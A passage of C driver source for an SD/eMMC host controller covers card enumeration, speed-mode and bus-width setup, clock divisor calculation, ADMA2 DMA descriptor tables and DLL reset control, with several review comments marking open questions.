 * 		- XST_SUCCESS if initialization is successful
 * 		- XST_FAILURE if failure
 *
 ******************************************************************************/
s32 XSdPs_MmcModeInit(XSdPs *InstancePtr)
{
	s32 Status;
	/* 32-byte aligned static buffer: DMA target for the EXT_CSD read */
#ifdef __ICCARM__
#pragma data_alignment = 32
	static u8 ExtCsd[512];
#else
	static u8 ExtCsd[512] __attribute__ ((aligned(32)));
#endif

	/* MMC cards are run with a 4-bit data bus here */
	InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
	Status = XSdPs_Change_BusWidth(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Assemble the 32-bit sector count from the four EXT_CSD bytes */
	InstancePtr->SectorCount = ((u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE4]) << 24;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE3] << 16;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE2] << 8;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE1];

	/* Enter high-speed mode when the device advertises it */
	if (((ExtCsd[EXT_CSD_DEVICE_TYPE_BYTE] &
	      EXT_CSD_DEVICE_TYPE_HIGH_SPEED) != 0U) &&
	    (InstancePtr->BusWidth >= XSDPS_4_BIT_WIDTH)) {
		InstancePtr->Mode = XSDPS_HIGH_SPEED_MODE;
		Status = XSdPs_Change_BusSpeed(InstancePtr);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
		/* Re-read EXT_CSD to verify the timing switch took effect */
		Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
		if (ExtCsd[EXT_CSD_HS_TIMING_BYTE] != EXT_CSD_HS_TIMING_HIGH) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function does eMMC mode initialization: it picks the widest data bus
 * the host configuration allows, reads the extended CSD for the sector
 * count, switches to the best supported speed mode, and enables the
 * RST_n function when it is still in its temporarily-disabled state.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if initialization is successful
 * 		- XST_FAILURE if failure
 *
 ******************************************************************************/
s32 XSdPs_EmmcModeInit(XSdPs *InstancePtr)
{
	s32 Status;
	/* 32-byte aligned static buffer: DMA target for the EXT_CSD read */
#ifdef __ICCARM__
#pragma data_alignment = 32
	static u8 ExtCsd[512];
#else
	static u8 ExtCsd[512] __attribute__ ((aligned(32)));
#endif

	if ((InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) &&
	    (InstancePtr->Config.BusWidth == XSDPS_WIDTH_8)) {
		/* in case of eMMC data width 8-bit */
		InstancePtr->BusWidth = XSDPS_8_BIT_WIDTH;
	} else if (InstancePtr->Config.BusWidth == XSDPS_WIDTH_4) {
		/* in case of eMMC data width 4-bit */
		InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
	} else {
		/* in case of eMMC data width 1-bit */
		InstancePtr->BusWidth = XSDPS_1_BIT_WIDTH;
	}

	Status = XSdPs_Change_BusWidth(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get Extended CSD */
	Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Assemble the 32-bit sector count from the four EXT_CSD bytes */
	InstancePtr->SectorCount = ((u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE4]) << 24;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE3] << 16;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE2] << 8;
	InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE1];

	/* Choose the speed mode from the device-type field, then apply it */
	XSdPs_IdentifyEmmcMode(InstancePtr, ExtCsd);

	if (InstancePtr->Mode != XSDPS_DEFAULT_SPEED_MODE) {
		Status = XSdPs_Change_BusSpeed(InstancePtr);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
		/* Confirm the card actually switched its HS_TIMING */
		Status = XSdPs_CheckEmmcTiming(InstancePtr, ExtCsd);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	/* Enable Rst_n_Fun bit if it is disabled */
	if(ExtCsd[EXT_CSD_RST_N_FUN_BYTE] == EXT_CSD_RST_N_FUN_TEMP_DIS) {
		Status = XSdPs_Set_Mmc_ExtCsd(InstancePtr, XSDPS_MMC_RST_FUN_EN_ARG);
		if (Status != XST_SUCCESS) {
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function disables the bus power.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return	None
 *
 ******************************************************************************/
void XSdPs_DisableBusPower(XSdPs *InstancePtr)
{
	u8 PwrVal;

	/*
	 * A 3.0 host asserts the eMMC hardware reset line while dropping
	 * bus power; older hosts just clear the power control register.
	 */
	PwrVal = (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) ?
		 XSDPS_PC_EMMC_HW_RST_MASK : 0x0;
	XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
			XSDPS_POWER_CTRL_OFFSET, PwrVal);

	/* Allow 1ms for the card to power off */
	(void)usleep(1000U);
}
/*****************************************************************************/
/**
 * @brief
 * This function enables the bus power.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return	None
 *
 ******************************************************************************/
void XSdPs_EnableBusPower(XSdPs *InstancePtr)
{
	u8 PwrVal = XSDPS_PC_BUS_VSEL_3V3_MASK | XSDPS_PC_BUS_PWR_MASK;

	/*
	 * Select 3.3V and turn on bus power; a 3.0 host additionally
	 * releases the eMMC hardware reset bit in the same write.
	 */
	if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
		PwrVal &= (u8)(~XSDPS_PC_EMMC_HW_RST_MASK);
	}
	XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
			XSDPS_POWER_CTRL_OFFSET, PwrVal);

	/* 0.2ms settle time after enabling bus power */
	usleep(200);
}
/*****************************************************************************/
/**
 * @brief
 * This function enumerates the SD card: detect, reset, query interface and
 * operating conditions, read CID/CSD, set the default clock, and select the
 * card into the transfer state.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if enumeration is successful
 * 		- XST_FAILURE if any enumeration step fails
 *
 ******************************************************************************/
s32 XSdPs_SdCardEnum(XSdPs *InstancePtr)
{
	s32 Status;

	/* Check if the card is present */
	Status = XSdPs_CheckCardDetect(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Reset the SD card */
	Status = XSdPs_CardReset(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the card interface condition (CMD8 voltage check) */
	Status = XSdPs_CardIfCond(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the card operating condition */
	Status = XSdPs_CardOpCond(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the card ID */
	Status = XSdPs_GetCardId(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the CSD register */
	Status = XSdPs_GetCsd(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Change clock to default clock 25MHz */
	/*
	 * SD default speed mode timing should be closed at 19 MHz.
	 * The reason for this is SD requires a voltage level shifter.
	 * This limitation applies to ZynqMPSoC.
	 */
	if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
		InstancePtr->BusSpeed = SD_CLK_19_MHZ;
	} else {
		InstancePtr->BusSpeed = SD_CLK_25_MHZ;
	}
	Status = XSdPs_Change_ClkFreq(InstancePtr, InstancePtr->BusSpeed);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Select the card to transition to transfer state */
	Status = XSdPs_Select_Card(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Pull-up disconnected during data transfer */
	Status = XSdPs_Pullup(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function enumerates the MMC card: detect, reset, query the operating
 * condition, read CID/CSD, set the default clock, and select the card into
 * the transfer state.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if enumeration is successful
 * 		- XST_FAILURE if any enumeration step fails
 *
 ******************************************************************************/
s32 XSdPs_MmcCardEnum(XSdPs *InstancePtr)
{
	s32 Status;

	/* Check if the card is present */
	Status = XSdPs_CheckCardDetect(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Reset the card */
	Status = XSdPs_CardReset(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the card operating condition */
	Status = XSdPs_CardOpCond(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the card ID */
	Status = XSdPs_GetCardId(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Get the CSD register */
	Status = XSdPs_GetCsd(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Change clock to default clock 26MHz */
	InstancePtr->BusSpeed = SD_CLK_26_MHZ;
	Status = XSdPs_Change_ClkFreq(InstancePtr, InstancePtr->BusSpeed);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Send select card command to transition to transfer state */
	Status = XSdPs_Select_Card(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function performs SD tuning: an auto-tuning cycle bracketed by DLL
 * resets on non-Versal platforms so the newly tuned tap values are loaded.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if tuning is successful
 * 		- XST_FAILURE if failure
 *
 ******************************************************************************/
s32 XSdPs_Execute_Tuning(XSdPs *InstancePtr)
{
	s32 Status;

#ifndef versal
	/* Issue DLL Reset to load new SDHC tuned tap values */
	Status = XSdPs_DllReset(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}
#endif

	/* Perform the auto tuning */
	Status = XSdPs_AutoTuning(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

#ifndef versal
	/* Issue DLL Reset to load new SDHC tuned tap values */
	Status = XSdPs_DllReset(InstancePtr);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}
#endif

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function is used to enable the clock: it starts the internal clock
 * with the requested divisor, waits for it to stabilize, then gates the
 * SD clock out to the card.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 * @param	ClockReg is the clock value to be set.
 *
 * @return
 * 		- XST_SUCCESS if success
 * 		- XST_FAILURE if the internal clock never became stable
 *
 ******************************************************************************/
s32 XSdPs_EnableClock(XSdPs *InstancePtr, u16 ClockReg)
{
	u32 Retries = 150000U;
	u16 RegVal;

	/* Start the internal clock with the requested settings */
	ClockReg |= (u16)XSDPS_CC_INT_CLK_EN_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_CLK_CTRL_OFFSET, ClockReg);

	/* Poll (bounded, roughly 150ms worth of attempts) for stability */
	do {
		RegVal = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
					 XSDPS_CLK_CTRL_OFFSET);
		Retries--;
		usleep(1);
	} while (((RegVal & XSDPS_CC_INT_CLK_STABLE_MASK) == 0U) &&
		 (Retries != 0U));

	if (Retries == 0U) {
		return XST_FAILURE;
	}

	/* Internal clock is stable: enable the SD clock to the card */
	ClockReg |= XSDPS_CC_SD_CLK_EN_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_CLK_CTRL_OFFSET, ClockReg);

	return XST_SUCCESS;
}
/*****************************************************************************/
/**
 * @brief
 * This function maps the currently selected speed mode to the switch
 * command argument and records the maximum clock for that mode.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 * @param	Arg is the argument to be sent along with the command.
 *		This could be address or any other information
 *
 * @return
 * 		- XST_SUCCESS if success
 * 		- XST_FAILURE if the selected mode is not recognized
 *
 ******************************************************************************/
s32 XSdPs_CalcBusSpeed(XSdPs *InstancePtr, u32 *Arg)
{
	s32 Status = XST_SUCCESS;

	if (InstancePtr->CardType == XSDPS_CARD_SD) {
		/* SD card: pick the SWITCH (CMD6) argument and clock cap */
		if (InstancePtr->Mode == XSDPS_UHS_SPEED_MODE_SDR12) {
			*Arg = XSDPS_SWITCH_CMD_SDR12_SET;
			InstancePtr->BusSpeed = XSDPS_SD_SDR12_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_UHS_SPEED_MODE_SDR25) {
			*Arg = XSDPS_SWITCH_CMD_SDR25_SET;
			InstancePtr->BusSpeed = XSDPS_SD_SDR25_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_UHS_SPEED_MODE_SDR50) {
			*Arg = XSDPS_SWITCH_CMD_SDR50_SET;
			InstancePtr->BusSpeed = XSDPS_SD_SDR50_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_UHS_SPEED_MODE_SDR104) {
			*Arg = XSDPS_SWITCH_CMD_SDR104_SET;
			InstancePtr->BusSpeed = XSDPS_SD_SDR104_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_UHS_SPEED_MODE_DDR50) {
			*Arg = XSDPS_SWITCH_CMD_DDR50_SET;
			InstancePtr->BusSpeed = XSDPS_SD_DDR50_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_HIGH_SPEED_MODE) {
			*Arg = XSDPS_SWITCH_CMD_HS_SET;
			InstancePtr->BusSpeed = XSDPS_CLK_50_MHZ;
		} else {
			Status = XST_FAILURE;
		}
	} else {
		/* eMMC: pick the HS_TIMING switch argument and clock cap */
		if (InstancePtr->Mode == XSDPS_HS200_MODE) {
			*Arg = XSDPS_MMC_HS200_ARG;
			InstancePtr->BusSpeed = XSDPS_MMC_HS200_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_DDR52_MODE) {
			*Arg = XSDPS_MMC_HIGH_SPEED_ARG;
			InstancePtr->BusSpeed = XSDPS_MMC_DDR_MAX_CLK;
		} else if (InstancePtr->Mode == XSDPS_HIGH_SPEED_MODE) {
			*Arg = XSDPS_MMC_HIGH_SPEED_ARG;
			InstancePtr->BusSpeed = XSDPS_MMC_HSD_MAX_CLK;
		} else {
			Status = XST_FAILURE;
		}
	}

	return Status;
}
/*****************************************************************************/
/**
 * @brief
 * This function prepares an ADMA2 read transfer from the SD card: it
 * programs the block size, builds the descriptor table, performs cache
 * maintenance, and selects the transfer-mode bits.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 * @param	BlkCnt - Block count passed by the user.
 * @param	BlkSize - Block size passed by the user.
 * @param	Buff - Pointer to the data buffer for a DMA transfer.
 *
 * @return	None
 *
 * @note	On the 64-bit-address path the descriptors are built from the
 *		previously recorded Dma64BitAddr and Buff is not consulted
 *		here; no cache invalidation happens on that path either --
 *		presumably handled elsewhere. TODO(review): confirm.
 *
 ******************************************************************************/
void XSdPs_SetupReadDma(XSdPs *InstancePtr, u16 BlkCnt, u16 BlkSize, u8 *Buff)
{
	/* Clamp to the valid block-size field and program it */
	BlkSize &= XSDPS_BLK_SIZE_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_BLK_SIZE_OFFSET, BlkSize);

	if (InstancePtr->Dma64BitAddr >= ADDRESS_BEYOND_32BIT) {
		XSdPs_SetupADMA2DescTbl64Bit(InstancePtr, BlkCnt);
	} else {
		XSdPs_SetupADMA2DescTbl(InstancePtr, BlkCnt, Buff);
		if (InstancePtr->Config.IsCacheCoherent == 0U) {
			/* Invalidate so the CPU re-reads DMA-written data */
			Xil_DCacheInvalidateRange((INTPTR)Buff,
						  (INTPTR)BlkCnt * BlkSize);
		}
	}

	if (BlkCnt == 1U) {
		/* Single-block read: no auto CMD12, no multi-block select */
		InstancePtr->TransferMode = XSDPS_TM_BLK_CNT_EN_MASK |
			XSDPS_TM_DAT_DIR_SEL_MASK | XSDPS_TM_DMA_EN_MASK;
	} else {
		/* Multi-block read with auto CMD12 to stop the transfer */
		InstancePtr->TransferMode = XSDPS_TM_AUTO_CMD12_EN_MASK |
			XSDPS_TM_BLK_CNT_EN_MASK | XSDPS_TM_DAT_DIR_SEL_MASK |
			XSDPS_TM_DMA_EN_MASK | XSDPS_TM_MUL_SIN_BLK_SEL_MASK;
	}
}
/*****************************************************************************/
/**
 * @brief
 * This function prepares an ADMA2 write transfer to the SD card: it
 * programs the block size, builds the descriptor table, performs cache
 * maintenance, and selects the transfer-mode bits.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 * @param	BlkCnt - Block count passed by the user.
 * @param	BlkSize - Block size passed by the user.
 * @param	Buff - Pointer to the data buffer for a DMA transfer.
 *
 * @return	None
 *
 * @note	On the 64-bit-address path the descriptors are built from the
 *		previously recorded Dma64BitAddr and Buff is not consulted
 *		here; no cache flush happens on that path either --
 *		presumably handled elsewhere. TODO(review): confirm.
 *
 ******************************************************************************/
void XSdPs_SetupWriteDma(XSdPs *InstancePtr, u16 BlkCnt, u16 BlkSize, const u8 *Buff)
{
	/* Clamp to the valid block-size field and program it */
	BlkSize &= XSDPS_BLK_SIZE_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_BLK_SIZE_OFFSET, BlkSize);

	if (InstancePtr->Dma64BitAddr >= ADDRESS_BEYOND_32BIT) {
		XSdPs_SetupADMA2DescTbl64Bit(InstancePtr, BlkCnt);
	} else {
		XSdPs_SetupADMA2DescTbl(InstancePtr, BlkCnt, Buff);
		if (InstancePtr->Config.IsCacheCoherent == 0U) {
			/* Flush so the device sees the CPU-written data */
			Xil_DCacheFlushRange((INTPTR)Buff,
					     (INTPTR)BlkCnt * BlkSize);
		}
	}

	if (BlkCnt == 1U) {
		/* Single-block write (data direction bit clear = write) */
		InstancePtr->TransferMode = XSDPS_TM_BLK_CNT_EN_MASK |
			XSDPS_TM_DMA_EN_MASK;
	} else {
		/* Multi-block write with auto CMD12 to stop the transfer */
		InstancePtr->TransferMode = XSDPS_TM_AUTO_CMD12_EN_MASK |
			XSDPS_TM_BLK_CNT_EN_MASK |
			XSDPS_TM_MUL_SIN_BLK_SEL_MASK | XSDPS_TM_DMA_EN_MASK;
	}
}
/*****************************************************************************/
/**
 *
 * @brief
 * API to setup ADMA2 descriptor table for 32-bit DMA
 *
 *
 * @param	InstancePtr is a pointer to the XSdPs instance.
 * @param	BlkCnt - block count.
 * @param	Buff pointer to data buffer.
 *
 * @return	None
 *
 * @note	The transfer is split into descriptor lines of
 *		XSDPS_DESC_MAX_LENGTH bytes each. A Length field of 0 on the
 *		full-size lines presumably encodes the maximum length per the
 *		SD Host ADMA2 descriptor format -- TODO(review): confirm.
 *
 ******************************************************************************/
void XSdPs_Setup32ADMA2DescTbl(XSdPs *InstancePtr, u32 BlkCnt, const u8 *Buff)
{
	/* 32-byte aligned static table, read by the controller via DMA */
#ifdef __ICCARM__
#pragma data_alignment = 32
	static XSdPs_Adma2Descriptor32 Adma2_DescrTbl[32];
#else
	static XSdPs_Adma2Descriptor32 Adma2_DescrTbl[32] __attribute__ ((aligned(32)));
#endif
	u32 TotalDescLines;
	u64 DescNum;
	u32 BlkSize;

	/* Setup ADMA2 - Write descriptor table and point ADMA SAR to it */
	BlkSize = (u32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				       XSDPS_BLK_SIZE_OFFSET) &
				       XSDPS_BLK_SIZE_MASK;

	/* Number of descriptor lines = ceil(total bytes / max line length) */
	if((BlkCnt*BlkSize) < XSDPS_DESC_MAX_LENGTH) {
		TotalDescLines = 1U;
	} else {
		TotalDescLines = ((BlkCnt*BlkSize) / XSDPS_DESC_MAX_LENGTH);
		if (((BlkCnt * BlkSize) % XSDPS_DESC_MAX_LENGTH) != 0U) {
			TotalDescLines += 1U;
		}
	}

	/* All lines but the last: full-length TRAN descriptors */
	for (DescNum = 0U; DescNum < (TotalDescLines-1); DescNum++) {
		Adma2_DescrTbl[DescNum].Address =
				(u32)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
		Adma2_DescrTbl[DescNum].Attribute =
				XSDPS_DESC_TRAN | XSDPS_DESC_VALID;
		Adma2_DescrTbl[DescNum].Length = 0U;
	}

	/* Last line: remaining byte count, marked END */
	Adma2_DescrTbl[TotalDescLines-1].Address =
			(u32)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
	Adma2_DescrTbl[TotalDescLines-1].Attribute =
			XSDPS_DESC_TRAN | XSDPS_DESC_END | XSDPS_DESC_VALID;
	Adma2_DescrTbl[TotalDescLines-1].Length =
			(u16)((BlkCnt*BlkSize) - (u32)(DescNum*XSDPS_DESC_MAX_LENGTH));

	/* Point the controller's ADMA system address register at the table */
	XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_OFFSET,
			(u32)((UINTPTR)&(Adma2_DescrTbl[0]) & (u32)~0x0));

	/* Flush the table so the controller reads up-to-date descriptors */
	if (InstancePtr->Config.IsCacheCoherent == 0U) {
		Xil_DCacheFlushRange((INTPTR)&(Adma2_DescrTbl[0]),
			sizeof(XSdPs_Adma2Descriptor32) * 32U);
	}
}
/*****************************************************************************/
/**
 *
 * @brief
 * API to setup ADMA2 descriptor table for 64-bit DMA
 *
 *
 * @param	InstancePtr is a pointer to the XSdPs instance.
 * @param	BlkCnt - block count.
 * @param	Buff pointer to data buffer.
 *
 * @return	None
 *
 * @note	The transfer is split into descriptor lines of
 *		XSDPS_DESC_MAX_LENGTH bytes each. A Length field of 0 on the
 *		full-size lines presumably encodes the maximum length per the
 *		SD Host ADMA2 descriptor format -- TODO(review): confirm.
 *
 ******************************************************************************/
void XSdPs_Setup64ADMA2DescTbl(XSdPs *InstancePtr, u32 BlkCnt, const u8 *Buff)
{
	/* 32-byte aligned static table, read by the controller via DMA */
#ifdef __ICCARM__
#pragma data_alignment = 32
	static XSdPs_Adma2Descriptor64 Adma2_DescrTbl[32];
#else
	static XSdPs_Adma2Descriptor64 Adma2_DescrTbl[32] __attribute__ ((aligned(32)));
#endif
	u32 TotalDescLines;
	u64 DescNum;
	u32 BlkSize;

	/* Setup ADMA2 - Write descriptor table and point ADMA SAR to it */
	BlkSize = (u32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				       XSDPS_BLK_SIZE_OFFSET) &
				       XSDPS_BLK_SIZE_MASK;

	/* Number of descriptor lines = ceil(total bytes / max line length) */
	if((BlkCnt*BlkSize) < XSDPS_DESC_MAX_LENGTH) {
		TotalDescLines = 1U;
	} else {
		TotalDescLines = ((BlkCnt*BlkSize) / XSDPS_DESC_MAX_LENGTH);
		if (((BlkCnt * BlkSize) % XSDPS_DESC_MAX_LENGTH) != 0U) {
			TotalDescLines += 1U;
		}
	}

	/* All lines but the last: full-length TRAN descriptors */
	for (DescNum = 0U; DescNum < (TotalDescLines-1); DescNum++) {
		Adma2_DescrTbl[DescNum].Address =
				((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
		Adma2_DescrTbl[DescNum].Attribute =
				XSDPS_DESC_TRAN | XSDPS_DESC_VALID;
		Adma2_DescrTbl[DescNum].Length = 0U;
	}

	/* Last line: remaining byte count, marked END */
	Adma2_DescrTbl[TotalDescLines-1].Address =
			(u64)((UINTPTR)Buff + (DescNum*XSDPS_DESC_MAX_LENGTH));
	Adma2_DescrTbl[TotalDescLines-1].Attribute =
			XSDPS_DESC_TRAN | XSDPS_DESC_END | XSDPS_DESC_VALID;
	Adma2_DescrTbl[TotalDescLines-1].Length =
			(u16)((BlkCnt*BlkSize) - (u32)(DescNum*XSDPS_DESC_MAX_LENGTH));

	/* On 64-bit builds also program the upper 32 bits of the table address */
#if defined(__aarch64__) || defined(__arch64__)
	XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_EXT_OFFSET,
			(u32)((UINTPTR)(Adma2_DescrTbl)>>32U));
#endif

	XSdPs_WriteReg(InstancePtr->Config.BaseAddress, XSDPS_ADMA_SAR_OFFSET,
			(u32)((UINTPTR)&(Adma2_DescrTbl[0]) & (u32)~0x0));

	/* Flush the table so the controller reads up-to-date descriptors */
	if (InstancePtr->Config.IsCacheCoherent == 0U) {
		Xil_DCacheFlushRange((INTPTR)&(Adma2_DescrTbl[0]),
			sizeof(XSdPs_Adma2Descriptor64) * 32U);
	}
}
/*****************************************************************************/
/**
 * @brief
 * This function is used calculate the clock divisor value for a requested
 * frequency based on the controller's input clock.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 * @param	SelFreq is the selected frequency
 *
 * @return	Clock divisor value (formatted for the clock control register)
 *
 ******************************************************************************/
u32 XSdPs_CalcClock(XSdPs *InstancePtr, u32 SelFreq)
{
	u16 RegVal = 0U;
	u16 Candidate;
	u16 Div = 0U;

	if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
		/* 3.0 host: search all divider counts up to the extended max */
		for (Candidate = 0x1U; Candidate <= XSDPS_CC_EXT_MAX_DIV_CNT;
		     Candidate++) {
			if (((InstancePtr->Config.InputClockHz) / Candidate)
			    <= SelFreq) {
				Div = Candidate >> 1;
				break;
			}
		}
	} else {
		/* Older host: divider must be a power of two */
		for (Candidate = 0x1U; Candidate <= XSDPS_CC_MAX_DIV_CNT;
		     Candidate <<= 1U) {
			if (((InstancePtr->Config.InputClockHz) / Candidate)
			    <= SelFreq) {
				Div = Candidate / 2U;
				break;
			}
		}
	}

	/* Split the divisor across the base and extended register fields */
	RegVal |= (Div & XSDPS_CC_SDCLK_FREQ_SEL_MASK) << XSDPS_CC_DIV_SHIFT;
	RegVal |= ((Div >> 8U) & XSDPS_CC_SDCLK_FREQ_SEL_EXT_MASK)
		  << XSDPS_CC_EXT_DIV_SHIFT;

	return RegVal;
}
/*****************************************************************************/
/**
 *
 * @brief
 * API to Set or Reset the DLL
 *
 *
 * @param	InstancePtr is a pointer to the XSdPs instance.
 * @param	EnRst is a flag indicating whether to Assert (1) or De-assert
 *		(0) the DLL reset.
 *
 * @return	None
 *
 * @note	The register and bit touched depend on the platform (Versal
 *		vs. non-Versal) and on which controller instance (SD0/SD1)
 *		is in use. At EL1 non-secure on aarch64 the write is
 *		delegated to firmware via an SMC call instead of a direct
 *		register access.
 *
 ******************************************************************************/
void XSdPs_DllRstCtrl(XSdPs *InstancePtr, u8 EnRst)
{
	u32 DeviceId;
	u32 DllCtrl;

	DeviceId = InstancePtr->Config.DeviceId;
#ifdef versal
#ifdef XPAR_PSV_PMC_SD_0_DEVICE_ID
	if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
		(void)DllCtrl;

		/*
		 * Non-secure EL1 cannot write the control register directly.
		 * NOTE(review): the mask here is SD_DLL_RST but the value is
		 * SD0_DLL_RST, unlike the SD1 branch below where both are
		 * SD_DLL_RST -- confirm these constants agree.
		 */
		XSdps_Smc(InstancePtr, SD0_DLL_CTRL, SD_DLL_RST, (EnRst == 1U) ? SD0_DLL_RST : 0U);
#else /* EL1_NONSECURE && defined (__aarch64__) */
		/* Read-modify-write the DLL reset bit for SD0 */
		DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD0_DLL_CTRL);
		if (EnRst == 1U) {
			DllCtrl |= SD_DLL_RST;
		} else {
			DllCtrl &= ~SD_DLL_RST;
		}
		XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD0_DLL_CTRL, DllCtrl);
#endif /* EL1_NONSECURE && defined (__aarch64__) */
	} else {
#endif /* XPAR_PSV_PMC_SD_0_DEVICE_ID */
		(void) DeviceId;
#if EL1_NONSECURE && defined (__aarch64__)
		(void)DllCtrl;

		/* Delegate the SD1 DLL reset write to firmware */
